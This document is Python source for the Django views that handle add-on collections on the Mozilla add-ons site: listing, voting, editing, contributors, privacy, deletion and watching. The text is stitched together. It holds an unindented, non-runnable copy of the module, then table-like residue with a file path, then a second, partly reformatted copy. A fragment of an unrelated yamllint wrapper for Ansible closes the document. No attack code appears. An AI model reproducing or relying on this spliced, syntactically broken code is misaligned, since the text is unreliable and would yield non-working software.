class CollectionFilter(BaseFilter):
opts = (('featured', _lazy(u'Featured')),
('followers', _lazy(u'Most Followers')),
('created', _lazy(u'Newest')))
extras = (('name', _lazy(u'Name')),
('updated', _lazy(u'Recently Updated')),
('popular', _lazy(u'Recently Popular')))
def filter_featured(self):
return self.base_queryset.filter(type=amo.COLLECTION_FEATURED)
def filter_followers(self):
return self.base_queryset.order_by('-subscribers')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_subscribers')
def filter_updated(self):
return self.base_queryset.order_by('-modified')
def filter_created(self):
return self.base_queryset.order_by('-created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def get_filter(request, base=None):
if base is None:
base = Collection.objects.listed()
base = (base.filter(Q(application=request.APP.id) | Q(application=None))
.exclude(addon_count=0))
return CollectionFilter(request, base, key='sort', default='featured')
@non_atomic_requests
def render_cat(request, template, data=None, extra=None):
if extra is None:
extra = {}
if data is None:
data = {}
data.update(dict(search_cat='collections'))
return render(request, template, data, **extra)
# TODO (potch): restore this when we do mobile bandwagon
# @mobile_template('bandwagon/{mobile/}collection_listing.html')
@non_atomic_requests
def collection_listing(request, base=None):
sort = request.GET.get('sort')
# We turn users into followers.
if sort == 'users':
return redirect(urlparams(reverse('collections.list'),
sort='followers'), permanent=True)
filter = get_filter(request, base)
# Counts are hard to cache automatically, and accuracy for this
# one is less important. Remember it for 5 minutes.
countkey = hashlib.md5(str(filter.qs.query) + '_count').hexdigest()
count = cache.get(countkey)
if count is None:
count = filter.qs.count()
cache.set(countkey, count, 300)
collections = paginate(request, filter.qs, count=count)
return render_cat(request, 'bandwagon/impala/collection_listing.html',
dict(collections=collections, src='co-hc-sidebar',
dl_src='co-dp-sidebar', filter=filter, sort=sort,
sorting=filter.field))
def get_votes(request, collections):
if not request.user.is_authenticated():
return {}
q = CollectionVote.objects.filter(
user=request.user, collection__in=[c.id for c in collections])
return dict((v.collection_id, v) for v in q)
@allow_mine
@non_atomic_requests
def user_listing(request, username):
author = get_object_or_404(UserProfile, username=username)
qs = (Collection.objects.filter(author__username=username)
.order_by('-created'))
mine = (request.user.is_authenticated() and
request.user.username == username)
if mine:
page = 'mine'
else:
page = 'user'
qs = qs.filter(listed=True)
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, collection_votes=votes,
page=page, author=author,
filter=get_filter(request)))
class CollectionAddonFilter(BaseFilter):
opts = (('added', _lazy(u'Added')),
('popular', _lazy(u'Popularity')),
('name', _lazy(u'Name')))
def filter_added(self):
return self.base_queryset.order_by('collectionaddon__created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_downloads')
@allow_mine
@non_atomic_requests
def collection_detail(request, username, slug):
c = get_collection(request, username, slug)
if not c.listed:
if not request.user.is_authenticated():
return redirect_for_login(request)
if not acl.check_collection_ownership(request, c):
raise PermissionDenied
if request.GET.get('format') == 'rss':
return http.HttpResponsePermanentRedirect(c.feed_url())
base = Addon.objects.valid() & c.addons.all()
filter = CollectionAddonFilter(request, base,
key='sort', default='popular')
notes = get_notes(c)
# Go directly to CollectionAddon for the count to avoid joins.
count = CollectionAddon.objects.filter(
Addon.objects.valid_q(amo.VALID_ADDON_STATUSES, prefix='addon__'),
collection=c.id)
addons = paginate(request, filter.qs, per_page=15, count=count.count())
# The add-on query is not related to the collection, so we need to manually
# hook them up for invalidation. Bonus: count invalidation.
keys = [addons.object_list.flush_key(), count.flush_key()]
caching.invalidator.add_to_flush_list({c.flush_key(): keys})
if c.author_id:
qs = Collection.objects.listed().filter(author=c.author)
others = amo.utils.randslice(qs, limit=4, exclude=c.id)
else:
others = []
# `perms` is defined in django.contrib.auth.context_processors. Gotcha!
user_perms = {
'view_stats': acl.check_ownership(request, c, require_owner=False),
}
tags = Tag.objects.filter(id__in=c.top_tags) if c.top_tags else []
return render_cat(request, 'bandwagon/collection_detail.html',
{'collection': c, 'filter': filter, 'addons': addons,
'notes': notes, 'author_collections': others,
'tags': tags, 'user_perms': user_perms})
@json_view(has_trans=True)
@allow_mine
@non_atomic_requests
def collection_detail_json(request, username, slug):
c = get_collection(request, username, slug)
if not (c.listed or acl.check_collection_ownership(request, c)):
raise PermissionDenied
# We evaluate the QuerySet with `list` to work around bug 866454.
addons_dict = [addon_to_dict(a) for a in list(c.addons.valid())]
return {
'name': c.name,
'url': c.get_abs_url(),
'iconUrl': c.icon_url,
'addons': addons_dict
}
def get_notes(collection, raw=False):
# This might hurt in a big collection with lots of notes.
# It's a generator so we don't evaluate anything by default.
notes = CollectionAddon.objects.filter(collection=collection,
comments__isnull=False)
rv = {}
for note in notes:
# Watch out for comments in a language we didn't pick up.
if note.comments:
rv[note.addon_id] = (note.comments.localized_string if raw
else note.comments)
yield rv
@write
@login_required
def collection_vote(request, username, slug, direction):
c = get_collection(request, username, slug)
if request.method != 'POST':
return http.HttpResponseRedirect(c.get_url_path())
vote = {'up': 1, 'down': -1}[direction]
qs = (CollectionVote.objects.using('default')
.filter(collection=c, user=request.user))
if qs:
cv = qs[0]
if vote == cv.vote: # Double vote => cancel.
cv.delete()
else:
cv.vote = vote
cv.save(force_update=True)
else:
CollectionVote.objects.create(collection=c, user=request.user,
vote=vote)
if request.is_ajax():
return http.HttpResponse()
else:
return http.HttpResponseRedirect(c.get_url_path())
def initial_data_from_request(request):
return dict(author=request.user, application=request.APP.id)
def collection_message(request, collection, option):
if option == 'add':
title = _('Collection created!')
msg = _(
'Your new collection is shown below. You can '
'<a href="%(url)s">edit additional settings</a> if you\'d '
'like.'
) % {'url': collection.edit_url()}
elif option == 'update':
title = _('Collection updated!')
msg = _(
'<a href="%(url)s">View your collection</a> to see the changes.'
) % {'url': collection.get_url_path()}
else:
raise ValueError('Incorrect option "%s", '
'takes only "add" or "update".' % option)
messages.success(request, title, msg, message_safe=True)
@write
@login_required
@restricted_content
def add(request):
"""Displays/processes a form to create a collection."""
data = {}
if request.method == 'POST':
form = forms.CollectionForm(
request.POST, request.FILES,
initial=initial_data_from_request(request))
aform = forms.AddonsForm(request.POST)
if form.is_valid():
collection = form.save(default_locale=request.LANG)
collection.save()
if aform.is_valid():
aform.save(collection)
collection_message(request, collection, 'add')
statsd.incr('collections.created')
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(collection.get_url_path())
else:
data['addons'] = Addon.objects.filter(pk__in=aform.clean_addon())
data['comments'] = aform.clean_addon_comment()
else:
form = forms.CollectionForm()
data.update(form=form, filter=get_filter(request))
return render_cat(request, 'bandwagon/add.html', data)
@write
@login_required(redirect=False)
def ajax_new(request):
form = forms.CollectionForm(
request.POST or None,
initial={'author': request.user, 'application': request.APP.id},
)
if request.method == 'POST' and form.is_valid():
collection = form.save()
addon_id = request.REQUEST['addon_id']
collection.add_addon(Addon.objects.get(pk=addon_id))
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(reverse('collections.ajax_list') +
'?addon_id=%s' % addon_id)
return render(request, 'bandwagon/ajax_new.html', {'form': form})
@login_required(redirect=False)
@non_atomic_requests
def ajax_list(request):
try:
addon_id = int(request.GET['addon_id'])
except (KeyError, ValueError):
return http.HttpResponseBadRequest()
collections = (
Collection.objects
.publishable_by(request.user)
.with_has_addon(addon_id))
return render(request, 'bandwagon/ajax_list.html',
{'collections': collections})
@write
@login_required
@post_required
def collection_alter(request, username, slug, action):
c = get_collection(request, username, slug)
return change_addon(request, c, action)
def change_addon(request, collection, action):
if not acl.check_collection_ownership(request, collection):
raise PermissionDenied
try:
addon = get_object_or_404(Addon.objects, pk=request.POST['addon_id'])
except (ValueError, KeyError):
return http.HttpResponseBadRequest()
getattr(collection, action + '_addon')(addon)
log.info(u'%s: %s %s to collection %s' %
(request.user, action, addon.id, collection.id))
if request.is_ajax():
url = '%s?addon_id=%s' % (reverse('collections.ajax_list'), addon.id)
else:
url = collection.get_url_path()
return http.HttpResponseRedirect(url)
@write
@login_required
@post_required
def ajax_collection_alter(request, action):
try:
c = get_object_or_404(Collection.objects, pk=request.POST['id'])
except (ValueError, KeyError):
return http.HttpResponseBadRequest()
return change_addon(request, c, action)
@write
@login_required
# Contributors are allowed to *see* the page, but there is another
# permission check below to prevent them from doing any modifications.
@owner_required(require_owner=False)
def edit(request, collection, username, slug):
is_admin = acl.action_allowed(request, 'Collections', 'Edit')
if not acl.check_collection_ownership(
request, collection, require_owner=True):
if request.method == 'POST':
raise PermissionDenied
form = None
elif request.method == 'POST':
initial = initial_data_from_request(request)
if collection.author_id: # Don't try to change the author.
initial['author'] = collection.author
form = forms.CollectionForm(request.POST, request.FILES,
initial=initial,
instance=collection)
if form.is_valid():
collection = form.save()
collection_message(request, collection, 'update')
log.info(u'%s edited collection %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.edit_url())
else:
form = forms.CollectionForm(instance=collection)
qs = (CollectionAddon.objects.no_cache().using('default')
.filter(collection=collection))
meta = dict((c.addon_id, c) for c in qs)
addons = collection.addons.no_cache().all()
comments = get_notes(collection, raw=True).next()
if is_admin:
initial = dict(type=collection.type,
application=collection.application)
admin_form = forms.AdminForm(initial=initial)
else:
admin_form = None
data = dict(collection=collection,
form=form,
username=username,
slug=slug,
meta=meta,
filter=get_filter(request),
is_admin=is_admin,
admin_form=admin_form,
addons=addons,
comments=comments)
return render_cat(request, 'bandwagon/edit.html', data)
@write
@login_required
@owner_required(require_owner=False)
@post_required
def edit_addons(request, collection, username, slug):
if request.method == 'POST':
form = forms.AddonsForm(request.POST)
if form.is_valid():
form.save(collection)
collection_message(request, collection, 'update')
log.info(u'%s added add-ons to %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.edit_url() + '#addons-edit')
@write
@login_required
@owner_required
@post_required
def edit_contributors(request, collection, username, slug):
is_admin = acl.action_allowed(request, 'Collections', 'Edit')
if is_admin:
admin_form = forms.AdminForm(request.POST)
if admin_form.is_valid():
admin_form.save(collection)
form = forms.ContributorsForm(request.POST)
if form.is_valid():
form.save(collection)
collection_message(request, collection, 'update')
if form.cleaned_data['new_owner']:
return http.HttpResponseRedirect(collection.get_url_path())
return http.HttpResponseRedirect(collection.edit_url() + '#users-edit')
@write
@login_required
@owner_required
@post_required
def edit_privacy(request, collection, username, slug):
collection.listed = not collection.listed
collection.save()
log.info(u'%s changed privacy on collection %s' %
(request.user, collection.id))
return http.HttpResponseRedirect(collection.get_url_path())
@write
@login_required
def delete(request, username, slug):
collection = get_object_or_404(Collection, author__username=username,
slug=slug)
if not acl.check_collection_ownership(request, collection, True):
log.info(u'%s is trying to delete collection %s'
% (request.user, collection.id))
raise PermissionDenied
data = dict(collection=collection, username=username, slug=slug)
if request.method == 'POST':
if request.POST['sure'] == '1':
collection.delete()
log.info(u'%s deleted collection %s' %
(request.user, collection.id))
url = reverse('collections.user', args=[username])
return http.HttpResponseRedirect(url)
else:
return http.HttpResponseRedirect(collection.get_url_path())
return render_cat(request, 'bandwagon/delete.html', data)
@require_POST
@write
@login_required
@owner_required
@json_view
@csrf_protect
def delete_icon(request, collection, username, slug):
log.debug(u"User deleted collection (%s) icon " % slug)
tasks.delete_icon(os.path.join(collection.get_img_dir(),
'%d.png' % collection.id))
collection.icontype = ''
collection.save()
if request.is_ajax():
return {'icon': collection.icon_url}
else:
messages.success(request, _('Icon Deleted'))
return http.HttpResponseRedirect(collection.edit_url())
@login_required
@post_required
@json_view
def watch(request, username, slug):
"""
POST /collections/:user/:slug/watch to toggle the user's watching status.
For ajax, return {watching: true|false}. (reflects the new value)
Otherwise, redirect to the collection page.
"""
collection = get_collection(request, username, slug)
d = dict(user=request.user, collection=collection)
qs = CollectionWatcher.objects.no_cache().using('default').filter(**d)
watching = not qs # Flip the bool since we're about to change it.
if qs:
qs.delete()
else:
CollectionWatcher.objects.create(**d)
if request.is_ajax():
return {'watching': watching}
else:
return http.HttpResponseRedirect(collection.get_url_path())
@login_required
@non_atomic_requests
def following(request):
qs = (Collection.objects.filter(following__user=request.user)
.order_by('-following__created'))
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, votes=votes,
page='following', filter=get_filter(request)))
@login_required
@allow_mine
@non_atomic_requests
def mine(request, username=None, slug=None):
if slug is None:
return user_listing(request, username)
else:
return collection_detail(request, username, slug) | src/olympia/bandwagon/views.py | import functools
import hashlib
import os
from django import http
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.db.transaction import non_atomic_requests
from django.shortcuts import get_object_or_404, redirect
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_protect
from django.utils.translation import ugettext_lazy as _lazy, ugettext as _
import caching.base as caching
import commonware.log
from django_statsd.clients import statsd
from olympia import amo
from olympia.amo import messages
from olympia.amo.decorators import (
allow_mine, json_view, login_required, post_required, restricted_content,
write)
from olympia.amo.urlresolvers import reverse
from olympia.amo.utils import paginate, urlparams, render
from olympia.access import acl
from olympia.accounts.utils import redirect_for_login
from olympia.addons.models import Addon
from olympia.addons.views import BaseFilter
from olympia.legacy_api.utils import addon_to_dict
from olympia.tags.models import Tag
from olympia.translations.query import order_by_translation
from olympia.users.models import UserProfile
from .models import (
Collection, CollectionAddon, CollectionWatcher, CollectionVote,
SPECIAL_SLUGS)
from . import forms, tasks
log = commonware.log.getLogger('z.collections')
@non_atomic_requests
def get_collection(request, username, slug):
if (slug in SPECIAL_SLUGS.values() and request.user.is_authenticated() and
request.user.username == username):
return getattr(request.user, slug + '_collection')()
else:
return get_object_or_404(Collection.objects,
author__username=username, slug=slug)
def owner_required(f=None, require_owner=True):
"""Requires collection to be owned, by someone."""
def decorator(func):
@functools.wraps(func)
def wrapper(request, username, slug, *args, **kw):
collection = get_collection(request, username, slug)
if acl.check_collection_ownership(request, collection,
require_owner=require_owner):
return func(request, collection, username, slug, *args, **kw)
else:
raise PermissionDenied
return wrapper
return decorator(f) if f else decorator
@non_atomic_requests
def legacy_redirect(request, uuid, edit=False):
# Nicknames have a limit of 30, so len == 36 implies a uuid.
key = 'uuid' if len(uuid) == 36 else 'nickname'
c = get_object_or_404(Collection.objects, **{key: uuid})
if edit:
return http.HttpResponseRedirect(c.edit_url())
to = c.get_url_path() + '?' + request.GET.urlencode()
return http.HttpResponseRedirect(to)
@non_atomic_requests
def legacy_directory_redirects(request, page):
sorts = {'editors_picks': 'featured', 'popular': 'popular',
'users': 'followers'}
loc = base = reverse('collections.list')
if page in sorts:
loc = urlparams(base, sort=sorts[page])
elif request.user.is_authenticated():
if page == 'mine':
loc = reverse('collections.user', args=[request.user.username])
elif page == 'favorites':
loc = reverse('collections.following')
return http.HttpResponseRedirect(loc)
class CollectionFilter(BaseFilter):
opts = (('featured', _lazy(u'Featured')),
('followers', _lazy(u'Most Followers')),
('created', _lazy(u'Newest')))
extras = (('name', _lazy(u'Name')),
('updated', _lazy(u'Recently Updated')),
('popular', _lazy(u'Recently Popular')))
def filter_featured(self):
return self.base_queryset.filter(type=amo.COLLECTION_FEATURED)
def filter_followers(self):
return self.base_queryset.order_by('-subscribers')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_subscribers')
def filter_updated(self):
return self.base_queryset.order_by('-modified')
def filter_created(self):
return self.base_queryset.order_by('-created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def get_filter(request, base=None):
if base is None:
base = Collection.objects.listed()
base = (base.filter(Q(application=request.APP.id) | Q(application=None))
.exclude(addon_count=0))
return CollectionFilter(request, base, key='sort', default='featured')
@non_atomic_requests
def render_cat(request, template, data=None, extra=None):
if extra is None:
extra = {}
if data is None:
data = {}
data.update(dict(search_cat='collections'))
return render(request, template, data, **extra)
# TODO (potch): restore this when we do mobile bandwagon
# @mobile_template('bandwagon/{mobile/}collection_listing.html')
@non_atomic_requests
def collection_listing(request, base=None):
sort = request.GET.get('sort')
# We turn users into followers.
if sort == 'users':
return redirect(urlparams(reverse('collections.list'),
sort='followers'), permanent=True)
filter = get_filter(request, base)
# Counts are hard to cache automatically, and accuracy for this
# one is less important. Remember it for 5 minutes.
countkey = hashlib.md5(str(filter.qs.query) + '_count').hexdigest()
count = cache.get(countkey)
if count is None:
count = filter.qs.count()
cache.set(countkey, count, 300)
collections = paginate(request, filter.qs, count=count)
return render_cat(request, 'bandwagon/impala/collection_listing.html',
dict(collections=collections, src='co-hc-sidebar',
dl_src='co-dp-sidebar', filter=filter, sort=sort,
sorting=filter.field))
def get_votes(request, collections):
if not request.user.is_authenticated():
return {}
q = CollectionVote.objects.filter(
user=request.user, collection__in=[c.id for c in collections])
return dict((v.collection_id, v) for v in q)
@allow_mine
@non_atomic_requests
def user_listing(request, username):
author = get_object_or_404(UserProfile, username=username)
qs = (Collection.objects.filter(author__username=username)
.order_by('-created'))
mine = (request.user.is_authenticated() and
request.user.username == username)
if mine:
page = 'mine'
else:
page = 'user'
qs = qs.filter(listed=True)
collections = paginate(request, qs)
votes = get_votes(request, collections.object_list)
return render_cat(request, 'bandwagon/user_listing.html',
dict(collections=collections, collection_votes=votes,
page=page, author=author,
filter=get_filter(request)))
class CollectionAddonFilter(BaseFilter):
opts = (('added', _lazy(u'Added')),
('popular', _lazy(u'Popularity')),
('name', _lazy(u'Name')))
def filter_added(self):
return self.base_queryset.order_by('collectionaddon__created')
def filter_name(self):
return order_by_translation(self.base_queryset, 'name')
def filter_popular(self):
return self.base_queryset.order_by('-weekly_downloads')
@allow_mine
@non_atomic_requests
def collection_detail(request, username, slug):
c = get_collection(request, username, slug)
if not c.listed:
if not request.user.is_authenticated():
return redirect_for_login(request)
if not acl.check_collection_ownership(request, c):
raise PermissionDenied
if request.GET.get('format') == 'rss':
return http.HttpResponsePermanentRedirect(c.feed_url())
base = Addon.objects.valid() & c.addons.all()
filter = CollectionAddonFilter(request, base,
key='sort', default='popular')
notes = get_notes(c)
# Go directly to CollectionAddon for the count to avoid joins.
count = CollectionAddon.objects.filter(
Addon.objects.valid_q(amo.VALID_ADDON_STATUSES, prefix='addon__'),
collection=c.id)
addons = paginate(request, filter.qs, per_page=15, count=count.count())
# The add-on query is not related to the collection, so we need to manually
# hook them up for invalidation. Bonus: count invalidation.
keys = [addons.object_list.flush_key(), count.flush_key()]
caching.invalidator.add_to_flush_list({c.flush_key(): keys})
if c.author_id:
qs = Collection.objects.listed().filter(author=c.author)
others = amo.utils.randslice(qs, limit=4, exclude=c.id)
else:
others = []
# `perms` is defined in django.contrib.auth.context_processors. Gotcha!
user_perms = {
'view_stats': acl.check_ownership(request, c, require_owner=False),
}
tags = Tag.objects.filter(id__in=c.top_tags) if c.top_tags else []
return render_cat(request, 'bandwagon/collection_detail.html',
{'collection': c, 'filter': filter, 'addons': addons,
'notes': notes, 'author_collections': others,
'tags': tags, 'user_perms': user_perms})
@json_view(has_trans=True)
@allow_mine
@non_atomic_requests
def collection_detail_json(request, username, slug):
c = get_collection(request, username, slug)
if not (c.listed or acl.check_collection_ownership(request, c)):
raise PermissionDenied
# We evaluate the QuerySet with `list` to work around bug 866454.
addons_dict = [addon_to_dict(a) for a in list(c.addons.valid())]
return {
'name': c.name,
'url': c.get_abs_url(),
'iconUrl': c.icon_url,
'addons': addons_dict
}
def get_notes(collection, raw=False):
# This might hurt in a big collection with lots of notes.
# It's a generator so we don't evaluate anything by default.
notes = CollectionAddon.objects.filter(collection=collection,
comments__isnull=False)
rv = {}
for note in notes:
# Watch out for comments in a language we didn't pick up.
if note.comments:
rv[note.addon_id] = (note.comments.localized_string if raw
else note.comments)
yield rv
@write
@login_required
def collection_vote(request, username, slug, direction):
c = get_collection(request, username, slug)
if request.method != 'POST':
return http.HttpResponseRedirect(c.get_url_path())
vote = {'up': 1, 'down': -1}[direction]
qs = (CollectionVote.objects.using('default')
.filter(collection=c, user=request.user))
if qs:
cv = qs[0]
if vote == cv.vote: # Double vote => cancel.
cv.delete()
else:
cv.vote = vote
cv.save(force_update=True)
else:
CollectionVote.objects.create(collection=c, user=request.user,
vote=vote)
if request.is_ajax():
return http.HttpResponse()
else:
return http.HttpResponseRedirect(c.get_url_path())
def initial_data_from_request(request):
return dict(author=request.user, application=request.APP.id)
def collection_message(request, collection, option):
if option == 'add':
title = _('Collection created!')
msg = _(
'Your new collection is shown below. You can '
'<a href="%(url)s">edit additional settings</a> if you\'d '
'like.'
) % {'url': collection.edit_url()}
elif option == 'update':
title = _('Collection updated!')
msg = _(
'<a href="%(url)s">View your collection</a> to see the changes.'
) % {'url': collection.get_url_path()}
else:
raise ValueError('Incorrect option "%s", '
'takes only "add" or "update".' % option)
messages.success(request, title, msg, message_safe=True)
@write
@login_required
@restricted_content
def add(request):
"""Displays/processes a form to create a collection."""
data = {}
if request.method == 'POST':
form = forms.CollectionForm(
request.POST, request.FILES,
initial=initial_data_from_request(request))
aform = forms.AddonsForm(request.POST)
if form.is_valid():
collection = form.save(default_locale=request.LANG)
collection.save()
if aform.is_valid():
aform.save(collection)
collection_message(request, collection, 'add')
statsd.incr('collections.created')
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(collection.get_url_path())
else:
data['addons'] = Addon.objects.filter(pk__in=aform.clean_addon())
data['comments'] = aform.clean_addon_comment()
else:
form = forms.CollectionForm()
data.update(form=form, filter=get_filter(request))
return render_cat(request, 'bandwagon/add.html', data)
@write
@login_required(redirect=False)
def ajax_new(request):
form = forms.CollectionForm(
request.POST or None,
initial={'author': request.user, 'application': request.APP.id},
)
if request.method == 'POST' and form.is_valid():
collection = form.save()
addon_id = request.REQUEST['addon_id']
collection.add_addon(Addon.objects.get(pk=addon_id))
log.info('Created collection %s' % collection.id)
return http.HttpResponseRedirect(reverse('collections.ajax_list') +
'?addon_id=%s' % addon_id)
return render(request, 'bandwagon/ajax_new.html', {'form': form})
@login_required(redirect=False)
@non_atomic_requests
def ajax_list(request):
    """Render the ajax list of collections the user can publish to,
    annotated with whether each one already holds the add-on."""
    raw_id = request.GET.get('addon_id')
    try:
        addon_id = int(raw_id)
    except (TypeError, ValueError):
        # Missing or non-numeric addon_id -> 400, same as before.
        return http.HttpResponseBadRequest()
    publishable = (Collection.objects
                   .publishable_by(request.user)
                   .with_has_addon(addon_id))
    return render(request, 'bandwagon/ajax_list.html',
                  {'collections': publishable})
@write
@login_required
@post_required
def collection_alter(request, username, slug, action):
    """Apply an add/remove ``action`` to the collection named in the URL."""
    collection = get_collection(request, username, slug)
    return change_addon(request, collection, action)
def change_addon(request, collection, action):
    """Add or remove the POSTed add-on on ``collection``.

    ``action`` picks the Collection method to call ('add' ->
    add_addon, 'remove' -> remove_addon, ...).  Only users passing the
    collection-ownership ACL check may alter it.
    """
    if not acl.check_collection_ownership(request, collection):
        raise PermissionDenied

    try:
        addon_pk = request.POST['addon_id']
        addon = get_object_or_404(Addon.objects, pk=addon_pk)
    except (ValueError, KeyError):
        return http.HttpResponseBadRequest()

    mutate = getattr(collection, '%s_addon' % action)
    mutate(addon)
    log.info(u'%s: %s %s to collection %s' %
             (request.user, action, addon.id, collection.id))

    if request.is_ajax():
        destination = '%s?addon_id=%s' % (reverse('collections.ajax_list'),
                                          addon.id)
    else:
        destination = collection.get_url_path()
    return http.HttpResponseRedirect(destination)
@write
@login_required
@post_required
def ajax_collection_alter(request, action):
    """Ajax flavour of collection_alter: the collection pk is POSTed."""
    try:
        collection = get_object_or_404(Collection.objects,
                                       pk=request.POST['id'])
    except (ValueError, KeyError):
        return http.HttpResponseBadRequest()
    return change_addon(request, collection, action)
@write
@login_required
# Contributors are allowed to *see* the page, but there is another
# permission check below to prevent them from doing any modifications.
@owner_required(require_owner=False)
def edit(request, collection, username, slug):
    """Display and process the collection edit page.

    Contributors get a read-only page (form is None); owners and
    admins may POST changes.
    """
    is_admin = acl.action_allowed(request, 'Collections', 'Edit')

    if not acl.check_collection_ownership(
            request, collection, require_owner=True):
        # Contributor (not owner): viewing is allowed, posting is not.
        if request.method == 'POST':
            raise PermissionDenied
        form = None
    elif request.method == 'POST':
        initial = initial_data_from_request(request)
        if collection.author_id:  # Don't try to change the author.
            initial['author'] = collection.author
        form = forms.CollectionForm(request.POST, request.FILES,
                                    initial=initial,
                                    instance=collection)
        if form.is_valid():
            collection = form.save()
            collection_message(request, collection, 'update')
            log.info(u'%s edited collection %s' %
                     (request.user, collection.id))
            return http.HttpResponseRedirect(collection.edit_url())
        # Invalid POST falls through and re-renders the bound form.
    else:
        form = forms.CollectionForm(instance=collection)

    # Read fresh from the 'default' DB and bypass caches so the page
    # reflects changes made in this request.
    qs = (CollectionAddon.objects.no_cache().using('default')
          .filter(collection=collection))
    meta = dict((c.addon_id, c) for c in qs)
    addons = collection.addons.no_cache().all()
    # .next(): Python 2-style iterator access; takes the first batch of
    # notes yielded by get_notes().
    comments = get_notes(collection, raw=True).next()

    if is_admin:
        initial = dict(type=collection.type,
                       application=collection.application)
        admin_form = forms.AdminForm(initial=initial)
    else:
        admin_form = None

    data = dict(collection=collection,
                form=form,
                username=username,
                slug=slug,
                meta=meta,
                filter=get_filter(request),
                is_admin=is_admin,
                admin_form=admin_form,
                addons=addons,
                comments=comments)
    return render_cat(request, 'bandwagon/edit.html', data)
@write
@login_required
@owner_required(require_owner=False)
@post_required
def edit_addons(request, collection, username, slug):
    """Save the add-ons posted from the collection edit page."""
    if request.method == 'POST':
        addons_form = forms.AddonsForm(request.POST)
        if addons_form.is_valid():
            addons_form.save(collection)
            collection_message(request, collection, 'update')
            log.info(u'%s added add-ons to %s' %
                     (request.user, collection.id))
    # Invalid forms are silently ignored; always land back on the
    # add-ons tab of the edit page.
    return http.HttpResponseRedirect(collection.edit_url() + '#addons-edit')
@write
@login_required
@owner_required
@post_required
def edit_contributors(request, collection, username, slug):
    """Save contributor (and, for admins, type/application) changes."""
    if acl.action_allowed(request, 'Collections', 'Edit'):
        admin_form = forms.AdminForm(request.POST)
        if admin_form.is_valid():
            admin_form.save(collection)

    contributors_form = forms.ContributorsForm(request.POST)
    if contributors_form.is_valid():
        contributors_form.save(collection)
        collection_message(request, collection, 'update')
        if contributors_form.cleaned_data['new_owner']:
            # Ownership changed hands: the edit pages are no longer
            # ours, so go to the public collection page instead.
            return http.HttpResponseRedirect(collection.get_url_path())
    return http.HttpResponseRedirect(collection.edit_url() + '#users-edit')
@write
@login_required
@owner_required
@post_required
def edit_privacy(request, collection, username, slug):
    """Toggle the collection between listed (public) and unlisted."""
    new_state = not collection.listed
    collection.listed = new_state
    collection.save()
    log.info(u'%s changed privacy on collection %s' %
             (request.user, collection.id))
    return http.HttpResponseRedirect(collection.get_url_path())
@write
@login_required
def delete(request, username, slug):
    """Confirm and perform deletion of a collection.

    GET renders a confirmation page; a POST with sure=1 deletes the
    collection, any other POST bounces back to the collection page.
    Only owners (per the ACL check) may delete.
    """
    collection = get_object_or_404(Collection, author__username=username,
                                   slug=slug)

    if not acl.check_collection_ownership(request, collection, True):
        log.info(u'%s is trying to delete collection %s'
                 % (request.user, collection.id))
        raise PermissionDenied

    data = dict(collection=collection, username=username, slug=slug)

    if request.method == 'POST':
        # .get() instead of ['sure']: a POST without the field used to
        # raise MultiValueDictKeyError (HTTP 500); treat it as "not sure".
        if request.POST.get('sure') == '1':
            collection.delete()
            log.info(u'%s deleted collection %s' %
                     (request.user, collection.id))
            url = reverse('collections.user', args=[username])
            return http.HttpResponseRedirect(url)
        else:
            return http.HttpResponseRedirect(collection.get_url_path())

    return render_cat(request, 'bandwagon/delete.html', data)
@require_POST
@write
@login_required
@owner_required
@json_view
@csrf_protect
def delete_icon(request, collection, username, slug):
    """Remove a collection's custom icon and reset its icon type."""
    log.debug(u"User deleted collection (%s) icon " % slug)
    icon_path = os.path.join(collection.get_img_dir(),
                             '%d.png' % collection.id)
    tasks.delete_icon(icon_path)

    collection.icontype = ''
    collection.save()

    if not request.is_ajax():
        messages.success(request, _('Icon Deleted'))
        return http.HttpResponseRedirect(collection.edit_url())
    return {'icon': collection.icon_url}
@login_required
@post_required
@json_view
def watch(request, username, slug):
    """
    POST /collections/:user/:slug/watch to toggle the user's watching status.

    For ajax, return {watching: true|false}. (reflects the new value)
    Otherwise, redirect to the collection page.
    """
    collection = get_collection(request, username, slug)
    lookup = dict(user=request.user, collection=collection)
    existing = (CollectionWatcher.objects.no_cache().using('default')
                .filter(**lookup))
    now_watching = not existing  # state AFTER the toggle below
    if existing:
        existing.delete()
    else:
        CollectionWatcher.objects.create(**lookup)
    if request.is_ajax():
        return {'watching': now_watching}
    return http.HttpResponseRedirect(collection.get_url_path())
@login_required
@non_atomic_requests
def following(request):
    """List the collections the current user follows, newest first."""
    followed = (Collection.objects
                .filter(following__user=request.user)
                .order_by('-following__created'))
    collections = paginate(request, followed)
    votes = get_votes(request, collections.object_list)
    context = dict(collections=collections, votes=votes,
                   page='following', filter=get_filter(request))
    return render_cat(request, 'bandwagon/user_listing.html', context)
@login_required
@allow_mine
@non_atomic_requests
def mine(request, username=None, slug=None):
    """Show the current user's collection listing, or one collection.

    Defect fixed: stray " | 0.399929 | 0.056888 |" table residue fused
    onto the final line (extraction artifact, not code) was removed.
    """
    if slug is None:
        return user_listing(request, username)
    return collection_detail(request, username, slug)
"""Wrapper around yamllint that supports YAML embedded in Ansible modules."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
import json
import os
import re
import sys
import yaml
from yaml.resolver import Resolver
from yaml.constructor import SafeConstructor
from yaml.error import MarkedYAMLError
from _yaml import CParser # pylint: disable=no-name-in-module
from yamllint import linter
from yamllint.config import YamlLintConfig
def main():
    """Main program body."""
    paths = sys.argv[1:]
    if not paths:
        # No arguments: read the file list from stdin, one per line.
        paths = sys.stdin.read().splitlines()
    checker = YamlChecker()
    checker.check(paths)
    checker.report()
